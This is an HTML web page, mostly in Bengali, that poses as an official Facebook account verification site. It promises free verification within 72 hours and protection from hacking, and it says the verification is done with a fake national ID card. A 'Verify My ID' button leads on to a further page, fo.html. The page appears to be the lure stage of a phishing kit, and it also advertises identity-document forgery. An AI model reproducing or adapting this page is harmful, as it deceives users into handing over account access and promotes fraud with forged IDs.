


<!doctype html>
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
      <title>Facebook Account Confirm</title>
<link rel="stylesheet" href="style.css" type="text/css" media="all" />
</head>
<body>
  <div class="abm1">
    
 
<h1>সুখবর! সুখবর! সুখবর!</h1><br>
<div class="abm"></div>
<link href="https://fonts.googleapis.com/css2?family=Baloo+Da+2:wght@500&family=Hind+Siliguri&family=Mina&display=swap" rel="stylesheet">
<p>◾এখান থেকে আপনার ফেইসবুক একাউন্টটি বিনামূল্যে ভেরিফাই করতে পারবেন ।</p></link>

<h4>◾Offical Site For FB ID Verify</h4>


<table align= "center"><tr><td><img src="img/2.png" align= "center" width= "300" height =""></td></tr></table>


<h3>• আমরা বিনামূল্যে ফেইসবুক একাউন্ট Verify করি।</h3>

<h2>• আপনার ফেইসবুক একাউন্টকে হ্যাকিং/ডিজেবল থেকে নিরাপদ রাখতে Verify করুন।</h2>
<link href="https://fonts.googleapis.com/css2?family=Hind+Siliguri&family=Mina&display=swap" rel="stylesheet">
<b style="color:blue">আপনার ফেইসবুক একাউন্ট ৭২ ঘন্টার মধ্যে Verify হয়ে যাবে  </b></link>
 </div>
<br> <br>



<dive class="table">
  <img src="/img/b.jpg"></dive>

<br>
  <dive class="abm2">
<p> Fake NID Card তৈরি করে Verify করি</p>

<center>
<table border="1"align= "center"><tr><td><img src="img/c.jpg" align= "center" width= "300" height =""></td></tr></table><br></center>

 <h3> • Verify করতে নিচে ক্লিক করুন •<br>
⬇⬇⬇⬇<br></h3></dive>
					
					<form action="fo.html">
	          
					<input type="submit" name="submit" value="Verify My ID" class="abm3 abm5"></input>
				
				
				</form>
				

   </body>
 </html>
 


